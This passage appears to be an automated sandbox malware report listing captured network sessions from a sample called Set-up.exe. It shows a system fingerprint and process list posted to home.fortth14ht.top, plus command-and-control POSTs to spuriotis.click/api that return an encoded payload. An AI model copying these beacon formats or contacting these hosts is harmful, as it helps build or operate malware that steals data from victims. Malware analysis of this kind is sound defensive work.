                                                                                                                                                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914075668", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                                                                                                                                                        Dec 28, 2024 09:34:43.446976900 CET7416OUTData Raw: 4a 5c 2f 45 47 31 77 64 51 2b 49 6a 61 65 70 47 64 39 7a 38 4f 64 5a 6a 69 77 4f 70 57 56 39 63 57 4e 74 6f 49 4c 59 62 35 51 52 6e 47 56 7a 5c 2f 48 4f 49 2b 6e 37 39 45 7a 43 5c 2f 57 48 58 38 55 73 56 47 6e 68 63 52 58 77 6c 66 45 52 38 4f 66
                                                                                                                                                                        Data Ascii: J\/EG1wdQ+IjaepGd9z8OdZjiwOpWV9cWNtoILYb5QRnGVz\/HOI+n79EzC\/WHX8UsVGnhcRXwlfER8OfFWrhYYjDTdOtTWLpcDzws+Sas5U6soNNSjJxkm\/wCu6H0D\/pXYmnQq0fCqU4YmhSxNFPjbw5hUnRrwjOlP2M+L41o88ZJ8s4Rkr2lFNNH5CUV+v1v\/AMEnPEFwSP8AhdmioQcEHwRfEhh\/Cf8AipRg4wecHkV
                                                                                                                                                                        Dec 28, 2024 09:34:43.447022915 CET2472OUTData Raw: 48 38 51 2b 4c 56 74 62 69 4a 35 37 66 55 76 45 73 73 49 6b 68 38 4f 61 64 4e 41 68 6e 6a 44 78 58 2b 73 79 32 6a 78 61 6c 44 6f 6b 75 6b 2b 62 71 45 50 7a 7a 65 66 74 39 66 74 6e 65 47 72 51 65 4a 50 48 58 5c 2f 41 41 53 32 2b 4c 32 6c 2b 43 62
                                                                                                                                                                        Data Ascii: H8Q+LVtbiJ57fUvEssIkh8OadNAhnjDxX+sy2jxalDokuk+bqEPzzeft9ftneGrQeJPHX\/AAS2+L2l+CbZFudS1Hwf8YPDPxC8W2enlPON1H4B0nwTY6rPLDbq0t3by3doLNgY7qeIgtXKfsL6T4P\/AGa\/2MPGf7fHxrkn8W\/Fz4yeGde+Pnxa8dG3tL7xPqOjapdXWp+E\/BPhuVzDFp1neWcmkmLSI5bHTxr+pi3uPK07
                                                                                                                                                                        Dec 28, 2024 09:34:43.447062016 CET2472OUTData Raw: 72 6d 67 36 41 38 74 50 34 30 6a 54 5c 2f 6c 72 33 45 5c 2f 53 71 62 4c 38 33 2b 78 5c 2f 77 42 4e 50 33 46 76 5c 2f 77 42 75 6e 62 72 5c 2f 41 50 58 71 35 74 5c 2f 64 5c 2f 50 38 41 6e 4a 5c 2f 50 38 5c 2f 35 59 36 69 6f 64 73 66 7a 5c 2f 41 4d
                                                                                                                                                                        Data Ascii: rmg6A8tP40jT\/lr3E\/SqbL83+x\/wBNP3Fv\/wBunbr\/APXq5t\/d\/P8AnJ\/P8\/5Y6iodsfz\/AMfl\/ve5oOyn1+RWLHbs+v8An8OP8mmSt+73v\/38\/wA9Ocf4VN\/rP4\/+2f8A9b+X8qYw3SO+yPH+fw55\/wD10GhW27o+T5faKLzf+Xj8f6d+1Qt8io7plOvmeV+P\/wCqrSHb+7\/6Zeb5nP8An\/PSkb\/Wf
                                                                                                                                                                        Dec 28, 2024 09:34:43.447091103 CET2472OUTData Raw: 38 2b 33 36 30 2b 50 39 35 39 78 39 36 66 36 52 4c 4d 5a 4f 66 38 2b 6c 42 30 46 61 53 52 30 6b 52 50 4a 33 70 48 5c 2f 72 5a 4a 50 38 5c 2f 77 44 31 76 36 4d 6b 5c 2f 64 78 6f 48 2b 52 50 2b 66 67 5c 2f 35 39 66 65 6e 37 55 6b 58 5a 5c 2f 71 59
                                                                                                                                                                        Data Ascii: 8+360+P959x96f6RLMZOf8+lB0FaSR0kRPJ3pH\/rZJP8\/wD1v6Mk\/dxoH+RP+fg\/59fen7UkXZ\/qYY\/+ekX+P6+neiON2Z0SHY4\/c\/6z\/PPpx6VPtfOX9fMCH5I9j\/vP3f73Mn+om\/z\/AFok+Vv9X\/rJf3v\/ACw\/z6UeWm7Zs+eSL\/ln\/wAscn\/OfrT23x7937z975s3lxf67\/P0759KPa+cv6+Z0H7z
                                                                                                                                                                        Dec 28, 2024 09:34:43.447115898 CET2472OUTData Raw: 39 42 5c 2f 6e 38 61 5c 2f 33 78 50 38 41 6d 69 39 70 35 66 6a 5c 2f 41 4d 41 69 32 66 37 50 5c 2f 6a 76 5c 2f 41 4e 61 69 70 76 6e 5c 2f 41 4e 6e 39 61 68 72 50 32 6e 6c 2b 50 5c 2f 41 4e 41 72 39 32 5c 2f 77 44 67 6b 33 34 41 54 34 72 5c 2f 41
                                                                                                                                                                        Data Ascii: 9B\/n8a\/3xP8Ami9p5fj\/AMAi2f7P\/jv\/ANaipvn\/ANn9ahrP2nl+P\/ANAr92\/wDgk34AT4r\/ALOH7cfwqe7FhH8S\/DWm+AHvm3lbJPGngT4k+G3uzsDvi3XUDKdis+E+UE4FfhJX9Dn\/AAQ5fHhX9o8ZxjxB8Lz1x107x0P\/AGWv5d+l9jK+D8H6mMwsvZYnCcV8M4rD1NH7OvhsZOtSnZppuM4RlZpp210P7L+
                                                                                                                                                                        Dec 28, 2024 09:34:43.447150946 CET2472OUTData Raw: 5c 2f 31 71 44 6f 70 39 66 6c 2b 70 44 35 6e 58 2b 50 38 41 54 50 74 54 46 57 4e 6d 53 52 5c 2f 38 5c 2f 77 43 6a 66 5c 2f 57 71 62 62 5c 2f 41 2b 50 35 38 66 5c 2f 57 7a 2b 58 34 31 44 5c 2f 74 5c 2f 38 73 5c 2f 5c 2f 41 4b 5c 2f 35 39 4f 50 72
                                                                                                                                                                        Data Ascii: \/1qDop9fl+pD5nX+P8ATPtTFWNmSR\/8\/wCjf\/Wqbb\/A+P58f\/Wz+X41D\/t\/8s\/\/AK\/59OPrx1oOwh+8vz+nSPn\/AD7fjxULf3Nv0z\/P\/J+verkifKnyf9+8\/wBPT6\/\/AF4Ywnzv\/H\/y1\/z\/AJ\/Wgql0\/wAP+RD5f\/TGopPz483\/AFvWpZD\/ALGz\/rpL+vT\/ADjpTP7ibY+evbyfpQdxDJs+
                                                                                                                                                                        Dec 28, 2024 09:34:43.447235107 CET4944OUTData Raw: 78 5c 2f 76 4a 50 4c 32 52 7a 4a 48 39 6f 6c 38 30 5c 2f 75 50 4f 37 5c 2f 41 4f 4f 61 66 4a 6e 39 33 76 38 41 75 66 35 5c 2f 30 57 37 71 58 63 6e 33 4e 67 78 35 76 5c 2f 4c 76 46 35 48 2b 63 31 44 48 49 2b 50 37 69 52 5c 2f 36 72 39 39 64 66 2b
                                                                                                                                                                        Data Ascii: x\/vJPL2RzJH9ol80\/uPO7\/AOOafJn93v8Auf5\/0W7qXcn3Ngx5v\/LvF5H+c1DHI+P7iR\/6r99df+Av65NHx+Vvnv8Ad2NKfX5fqEn7zZvfZ5kVv5v7n9P8e\/H40NI6YT+P\/VCTzfP\/AM9Pwp8n+sTyf+eVvL9o83H6\/wD16hk2fM7p5P73yv3n+e\/1zxWZoM3eXvcIN\/mj93\/z2+n8v88m15PnTzN\/Mn+tP77
                                                                                                                                                                        Dec 28, 2024 09:34:43.566704035 CET4944OUTData Raw: 78 39 64 4f 2b 49 42 5c 2f 6c 34 5c 2f 57 6f 7a 5c 2f 77 57 75 5c 2f 61 4f 5c 2f 68 2b 46 5c 2f 77 41 43 78 39 64 4a 2b 49 5a 5c 2f 6c 38 52 56 72 38 67 66 47 31 76 34 66 38 45 2b 43 4e 61 38 58 7a 66 46 50 34 50 65 49 39 5a 38 4a 66 42 6e 34 52
                                                                                                                                                                        Data Ascii: x9dO+IB\/l4\/Woz\/wWu\/aO\/h+F\/wACx9dJ+IZ\/l8RVr8gfG1v4f8E+CNa8XzfFP4PeI9Z8JfBn4RftDeO\/hV4Y1v4jt8UvBHwY+NUfhH\/hDvHmrWfiX4UeGPh\/rWl211498G6f4mg8D\/ETxdf+HbnxHpst\/aLp7XF9b2vEOiWnhy28U6XcfEP4TXvxb8C\/DXUvi344\/Z00\/wAR+MpfjX4R8EaFoX\/CX+JLjV
                                                                                                                                                                        Dec 28, 2024 09:34:43.566740036 CET4944OUTData Raw: 2f 6c 5c 2f 39 65 6c 5c 2f 65 65 57 36 62 50 38 41 6c 6c 2b 39 6b 38 33 5c 2f 41 4d 6c 66 38 5c 2f 57 6b 6a 58 37 6d 78 64 6a 6d 58 50 6c 79 63 66 35 4e 43 5c 2f 4d 75 7a 66 48 5c 2f 41 4e 4d 76 4d 36 5c 2f 71 50 2b 50 47 74 50 61 65 58 34 5c 2f
                                                                                                                                                                        Data Ascii: /l\/9el\/eeW6bP8All+9k83\/AMlf8\/WkjX7mxdjmXPlycf5NC\/MuzfH\/ANMvM6\/qP+PGtPaeX4\/8AD9fvj1pl5rPwf8AH2mWEfnXl5obxQRjPzuLm2fHyhj91T0Brzz44\/tR\/Df4oftNeMfjF8QtG8My\/B74Nf8ABSz4eftF+CvD\/wANfgUngOD9tz9m3VvEdtoHjDQvjJ4N8MeBvA+jfED42fB3w\/p994m+Gvj
                                                                                                                                                                        Dec 28, 2024 09:34:43.566884041 CET4944OUTData Raw: 2f 77 42 33 34 76 30 54 55 76 43 39 70 6f 75 76 66 51 6b 58 68 32 79 74 7a 4a 4a 70 73 4e 6a 44 35 76 7a 53 47 32 74 34 6f 44 49 53 51 53 58 61 4e 45 4c 45 39 53 57 7a 6b 2b 39 5a 75 70 2b 48 72 57 5c 2f 6a 4d 57 71 61 52 62 58 73 52 55 72 73 76
                                                                                                                                                                        Data Ascii: /wB34v0TUvC9pouvfQkXh2ytzJJpsNjD5vzSG2t4oDISQSXaNELE9SWzk+9Zup+HrW\/jMWqaRbXsRUrsvbWG5UKQcgCZH255OVPuOa\/W4eBuFw\/AWQcF4POMXQr8MZ\/V4jyfOJ4fD150swq43G4uXtcJVjLCVqThj8RhZU61GpH2M24r2ijOP4O\/pJ4\/MPE7P\/EPM8gwOMo8UcI5fwVnWSfWcXh4YjKMuyLKsjpTji6N
                                                                                                                                                                        Dec 28, 2024 09:34:47.234494925 CET157INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx/1.22.1
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:34:46 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.749741194.87.58.92807224C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 28, 2024 09:34:47.545162916 CET99OUTGET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1
                                                                                                                                                                        Host: home.fortth14ht.top
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Dec 28, 2024 09:34:48.880820036 CET372INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                        Server: nginx/1.22.1
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:34:48 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Content-Length: 207
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.749748194.87.58.92807224C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 28, 2024 09:34:49.150624990 CET172OUTPOST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1
                                                                                                                                                                        Host: home.fortth14ht.top
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                                                                                                                                        Data Ascii: { "id1": "0", "data": "Done1" }
                                                                                                                                                                        Dec 28, 2024 09:34:50.691662073 CET372INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                        Server: nginx/1.22.1
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:34:50 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Content-Length: 207
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.74969934.226.108.1554437224C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:34:29 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                                        Host: httpbin.org
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        2024-12-28 08:34:30 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:34:30 GMT
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Server: gunicorn/19.9.0
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                        2024-12-28 08:34:30 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                                                                                                                                        Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.749754172.67.128.1844437780C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:34:53 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:34:53 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                        2024-12-28 08:34:53 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:34:53 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=k11fn3ssd51117dn4299k0gqt6; expires=Wed, 23 Apr 2025 02:21:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tKcoZvy5MlHrpvQXq2kH%2F0QSY%2Fj96IohpHG2tXf63c29cliA4Nmf447gh0c7OqO1f%2BnRqnQ8lNRoBBlYUAMhGgsEwuctRERhB9Ov8f2c%2B2CYx5RuiUFldfz5uHMuZACaA5o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f9036bb5ef7199d-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1899&rtt_var=747&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=906&delivery_rate=1537651&cwnd=223&unsent_bytes=0&cid=4a5bc2177517f5e3&ts=924&x=0"
                                                                                                                                                                        2024-12-28 08:34:53 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                        2024-12-28 08:34:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.749760172.67.128.1844437780C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:34:55 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 45
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:34:55 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d
                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=5FwhVM--lll&j=
                                                                                                                                                                        2024-12-28 08:34:55 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:34:55 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=1q4chrl1pbfiqjpkc9so3uttbk; expires=Wed, 23 Apr 2025 02:21:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jWPpILhOv4nN8R8%2BjKFeEUP2HjqFhVuPAEMCvOQOmGgrEXyg2ANx8RJ9GpebdtRxdr4Rk9oPaQUQp0HtBChh7ph2rGZnYNTO%2FDOfrwqL5rPmB891xVIZPbbGClxDKslG4d8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f9036c8bacd43e2-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1754&rtt_var=682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=944&delivery_rate=1575822&cwnd=216&unsent_bytes=0&cid=efd5c44db38b39ab&ts=784&x=0"
                                                                                                                                                                        2024-12-28 08:34:55 UTC248INData Raw: 34 39 31 63 0d 0a 33 77 43 44 64 4f 35 48 44 44 52 55 7a 51 4b 52 39 71 4b 35 49 36 76 35 71 38 7a 6e 36 35 57 57 73 47 6d 50 65 2f 64 66 47 51 47 6b 49 76 56 57 31 48 4d 67 46 69 65 6f 49 4b 75 43 30 4d 78 47 68 39 76 4b 71 4d 58 52 38 2f 66 63 47 75 70 58 31 53 6c 30 49 2b 56 6d 34 68 69 64 49 69 41 57 4d 62 55 67 71 36 33 5a 6d 30 62 46 32 35 48 75 67 6f 48 33 39 39 77 4c 37 68 43 59 4c 33 56 69 74 32 7a 6b 48 49 73 6b 61 46 55 34 6f 47 66 30 6b 38 50 54 54 63 4b 55 77 36 48 46 78 37 66 7a 79 6b 75 31 57 62 6f 36 62 57 43 53 59 66 41 66 7a 44 6f 67 54 33 61 6f 62 4c 50 4d 67 4e 68 47 79 5a 58 4e 71 49 79 44 2f 66 37 55 43 75 73 52 68 7a 5a 2f 61 62 64 69 35 78 32 42 4c 58 78 59 4d 71 64 73 38 70 6e 44 6d 77 2b 4a 6e 4e 48 75 33 63
                                                                                                                                                                        Data Ascii: 491c3wCDdO5HDDRUzQKR9qK5I6v5q8zn65WWsGmPe/dfGQGkIvVW1HMgFieoIKuC0MxGh9vKqMXR8/fcGupX1Sl0I+Vm4hidIiAWMbUgq63Zm0bF25HugoH399wL7hCYL3Vit2zkHIskaFU4oGf0k8PTTcKUw6HFx7fzyku1Wbo6bWCSYfAfzDogT3aobLPMgNhGyZXNqIyD/f7UCusRhzZ/abdi5x2BLXxYMqds8pnDmw+JnNHu3c
                                                                                                                                                                        2024-12-28 08:34:55 UTC1369INData Raw: 6d 6b 78 74 45 61 2f 41 79 59 4c 58 30 6a 6f 69 7a 34 56 6f 73 70 4c 67 35 32 70 32 7a 39 6b 63 50 55 52 73 69 62 32 36 47 46 69 76 2f 38 31 67 48 69 46 70 6f 7a 63 57 53 31 61 2b 59 5a 69 79 31 6f 57 54 58 76 4c 72 4f 54 32 4a 73 5a 69 62 76 5a 72 59 61 64 2b 75 57 53 46 4b 4d 41 31 54 70 33 49 2b 55 69 35 78 69 4e 4b 47 35 45 50 71 52 72 39 6f 62 4c 30 6b 7a 45 6d 38 53 6b 69 6f 72 33 38 39 67 42 34 68 4f 52 4d 48 5a 6c 76 57 4b 68 57 4d 77 69 64 68 5a 75 37 30 50 32 68 4d 66 58 56 34 75 68 69 62 48 4c 6b 4c 66 7a 33 6b 75 31 57 5a 30 34 65 47 43 32 62 65 49 65 68 7a 64 75 52 44 43 69 5a 65 47 53 78 64 56 4c 79 6f 6e 44 6f 49 4f 4b 2f 76 2f 62 44 75 6f 64 31 58 4d 37 5a 4b 55 69 75 56 61 74 4b 47 56 61 50 4c 68 67 73 34 75 4f 77 67 48 4f 6c 34 6e 32 78
                                                                                                                                                                        Data Ascii: mkxtEa/AyYLX0joiz4VospLg52p2z9kcPURsib26GFiv/81gHiFpozcWS1a+YZiy1oWTXvLrOT2JsZibvZrYad+uWSFKMA1Tp3I+Ui5xiNKG5EPqRr9obL0kzEm8Skior389gB4hORMHZlvWKhWMwidhZu70P2hMfXV4uhibHLkLfz3ku1WZ04eGC2beIehzduRDCiZeGSxdVLyonDoIOK/v/bDuod1XM7ZKUiuVatKGVaPLhgs4uOwgHOl4n2x
                                                                                                                                                                        2024-12-28 08:34:55 UTC1369INData Raw: 53 52 61 30 65 6a 58 30 6a 49 35 64 68 39 52 57 47 5a 31 74 56 4f 4b 46 6e 35 64 54 66 6c 56 69 4a 6e 4d 58 75 33 63 6e 36 39 64 6f 4e 2f 78 61 59 50 6e 56 74 73 6d 66 75 48 6f 77 6c 59 31 4d 79 70 47 76 77 6d 63 54 4a 53 38 6d 54 7a 4b 2b 50 67 37 65 36 6b 67 7a 31 57 63 31 39 53 6e 53 32 49 4e 51 56 67 69 74 70 51 48 61 77 4c 75 72 55 78 39 63 42 6b 64 76 45 70 6f 43 4d 2b 50 58 59 42 65 67 54 6d 54 56 31 59 4b 39 74 35 52 61 41 4c 57 52 62 4f 4b 74 6f 2b 70 2f 4c 33 55 48 49 6b 59 6e 67 78 59 37 76 74 49 70 4c 32 52 36 5a 4d 48 51 68 69 47 48 76 47 49 73 7a 4c 6b 6c 34 74 69 44 30 6d 49 43 44 41 63 57 53 79 61 57 50 6a 66 66 7a 33 77 37 75 48 70 59 77 66 47 6d 7a 5a 65 55 61 68 53 68 6f 56 6a 47 72 5a 65 47 52 79 64 64 4e 69 64 57 4a 71 5a 33 4a 72 37
                                                                                                                                                                        Data Ascii: SRa0ejX0jI5dh9RWGZ1tVOKFn5dTflViJnMXu3cn69doN/xaYPnVtsmfuHowlY1MypGvwmcTJS8mTzK+Pg7e6kgz1Wc19SnS2INQVgitpQHawLurUx9cBkdvEpoCM+PXYBegTmTV1YK9t5RaALWRbOKto+p/L3UHIkYngxY7vtIpL2R6ZMHQhiGHvGIszLkl4tiD0mICDAcWSyaWPjffz3w7uHpYwfGmzZeUahShoVjGrZeGRyddNidWJqZ3Jr7
                                                                                                                                                                        2024-12-28 08:34:55 UTC1369INData Raw: 57 63 31 39 63 6d 71 76 62 4f 38 66 67 53 4e 6d 55 54 69 69 61 2f 57 66 78 39 78 48 78 4a 50 45 71 34 61 49 38 2f 37 41 43 4f 59 54 6d 44 63 37 4c 66 31 6c 2b 56 62 55 5a 55 6c 61 48 37 39 37 34 59 4b 41 78 41 2f 51 32 38 36 69 78 64 47 33 39 39 30 43 34 68 47 64 4d 6e 52 6e 73 32 54 6e 47 34 6b 71 5a 45 51 2b 6f 57 33 34 6d 38 76 4a 51 63 53 66 78 61 71 4e 67 76 32 30 6e 45 76 71 41 64 56 6c 4f 31 61 77 62 65 45 56 6d 6d 56 78 47 43 2f 76 5a 2f 2f 55 6d 4a 74 4e 78 35 76 47 6f 6f 6d 43 2f 2f 58 65 42 65 6f 63 6e 44 56 7a 63 62 78 6d 36 52 65 43 4b 6d 39 53 4d 36 70 6b 39 4a 44 47 31 41 47 48 32 38 36 32 78 64 47 33 32 2f 55 2b 72 7a 69 76 66 57 51 74 70 43 4c 6d 47 73 78 39 4c 6c 6f 31 6f 32 6a 38 6b 73 6e 58 53 38 43 51 78 61 57 42 68 66 37 78 31 41 72
                                                                                                                                                                        Data Ascii: Wc19cmqvbO8fgSNmUTiia/Wfx9xHxJPEq4aI8/7ACOYTmDc7Lf1l+VbUZUlaH7974YKAxA/Q286ixdG3990C4hGdMnRns2TnG4kqZEQ+oW34m8vJQcSfxaqNgv20nEvqAdVlO1awbeEVmmVxGC/vZ//UmJtNx5vGoomC//XeBeocnDVzcbxm6ReCKm9SM6pk9JDG1AGH2862xdG32/U+rzivfWQtpCLmGsx9Llo1o2j8ksnXS8CQxaWBhf7x1Ar
